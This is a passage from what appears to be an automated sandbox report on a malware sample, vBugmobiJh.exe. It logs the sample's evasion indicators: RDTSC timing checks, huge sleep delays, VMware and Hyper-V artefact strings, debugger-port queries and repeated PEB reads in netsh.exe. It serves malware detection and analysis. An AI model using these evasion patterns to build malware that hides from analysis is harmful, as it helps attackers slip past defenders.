          Source: C:\Windows\SysWOW64\netsh.exeRDTSC instruction interceptor: First address: 0000000000F485E4 second address: 0000000000F485EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\netsh.exeRDTSC instruction interceptor: First address: 0000000000F4896E second address: 0000000000F48974 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\vBugmobiJh.exeCode function: 6_2_004088A0 rdtsc
          Source: C:\Users\user\Desktop\vBugmobiJh.exeThread delayed: delay time: 922337203685477
          Source: C:\Users\user\Desktop\vBugmobiJh.exe TID: 5080Thread sleep time: -104474s >= -30000s
          Source: C:\Users\user\Desktop\vBugmobiJh.exe TID: 5796Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\explorer.exe TID: 6792Thread sleep time: -50000s >= -30000s
          Source: C:\Windows\SysWOW64\netsh.exe TID: 6632Thread sleep time: -44000s >= -30000s
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\netsh.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\netsh.exeLast function: Thread delayed
          Source: explorer.exe, 00000007.00000000.251470010.000000000871F000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
          Source: explorer.exe, 00000007.00000000.251470010.000000000871F000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000:
          Source: explorer.exe, 00000007.00000000.255680100.000000000F659000.00000004.00000001.sdmpBinary or memory string: AGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: vBugmobiJh.exe, 00000001.00000002.229831410.00000000026F1000.00000004.00000001.sdmpBinary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: explorer.exe, 00000007.00000000.251918197.00000000089B7000.00000004.00000001.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000007.00000000.251288287.0000000008640000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000007.00000000.250974966.0000000008220000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: vBugmobiJh.exe, 00000001.00000002.229831410.00000000026F1000.00000004.00000001.sdmpBinary or memory string: vmware
          Source: explorer.exe, 00000007.00000000.245895524.00000000055D0000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}V*(E
          Source: explorer.exe, 00000007.00000000.251470010.000000000871F000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}~
          Source: explorer.exe, 00000007.00000000.251470010.000000000871F000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
          Source: explorer.exe, 00000007.00000000.251549011.00000000087D1000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00ices
          Source: explorer.exe, 00000007.00000000.245936638.0000000005603000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b},
          Source: explorer.exe, 00000007.00000003.292122429.00000000089FD000.00000004.00000001.sdmpBinary or memory string: d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATAC
          Source: explorer.exe, 00000007.00000000.250974966.0000000008220000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: explorer.exe, 00000007.00000000.250974966.0000000008220000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: vBugmobiJh.exe, 00000001.00000002.229831410.00000000026F1000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II
          Source: vBugmobiJh.exe, 00000001.00000002.229831410.00000000026F1000.00000004.00000001.sdmpBinary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
          Source: explorer.exe, 00000007.00000000.250974966.0000000008220000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
          Source: C:\Users\user\Desktop\vBugmobiJh.exeProcess information queried: ProcessInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\netsh.exeProcess queried: DebugPort
          Source: C:\Users\user\Desktop\vBugmobiJh.exeCode function: 6_2_004088A0 rdtsc
          Source: C:\Users\user\Desktop\vBugmobiJh.exeCode function: 6_2_00409B10 LdrLoadDll,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03B94BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03B94BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03B94BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03B9B390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03B92397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03B71B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03B71B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03C1D380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03C2138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03B8DBE9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03B903E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03B903E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03B903E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03B903E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03B903E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03B903E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03C35BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03BE53CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03BE53CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03C38B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03B93B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03B93B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03B6DB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03C2131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03B6F358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03B6DB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03B7AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03B7AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03B9FAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03B652A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03B652A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03B652A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03B652A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03B652A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03B9D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03B9D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03B92AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03B92ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03BA4A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03BA4A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03C2EA55 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03B6AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03B6AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03C1B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03C1B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03C38A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03B83A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03B65210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03B65210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03B65210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03B65210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03B78A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03BA927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03C2AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03C2AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03BF4257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03B69240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03B69240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03B69240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03B69240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03BE51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03BE51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03BE51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03BE51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03BE69A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03B961A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03B961A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03B92990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03B8C182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03B9A185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03BF41E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03B6B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03B6B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03B6B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03B9513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03B9513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03B84120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03B84120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03B84120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03B84120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03B84120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03B69100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03B69100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03B69100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03B6B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03B6B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03B6C962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03B8B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03B8B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03B9F0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03B9F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03B9F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03BA90AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03B920A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03B920A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03B920A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03B920A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03B920A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03B920A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03B69080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03BE3884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03BE3884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03B640E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03B640E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03B640E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03B658EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03BFB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03BFB8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03BFB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03BFB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03BFB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03BFB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03B9002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03B9002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03B9002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03B9002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03B9002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03B7B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03B7B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03B7B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03B7B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03BE7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03BE7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03BE7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03C22073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03C31074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03C34015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03C34015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03B80050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03B80050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03B78794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03BE7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03BE7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03BE7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03BA37F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03B9E730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03B64F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03B64F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03C38F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03B8F716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03BFFF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03BFFF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03B9A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03B9A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03C3070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03C3070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03B7FF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03B7EF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03C1FEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03C38ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03BE46A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03BFFE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03B776E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03B916E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03C30EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03C30EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03C30EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03B936CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03BA8EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03C2AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03C2AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03B6E620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03B9A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03B9A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03B6C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03B6C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03B6C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03B98E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03C21608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03B8AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03B8AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03B8AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03B8AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03B8AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03B7766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03B77E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03B77E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03B77E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03B77E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03B77E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03B77E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03C1FE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03B91DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03B91DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03B91DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03B935A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03C2FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03C2FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03C2FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03C2FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03B9FD9B mov eax, dword ptr fs:[00000030h]
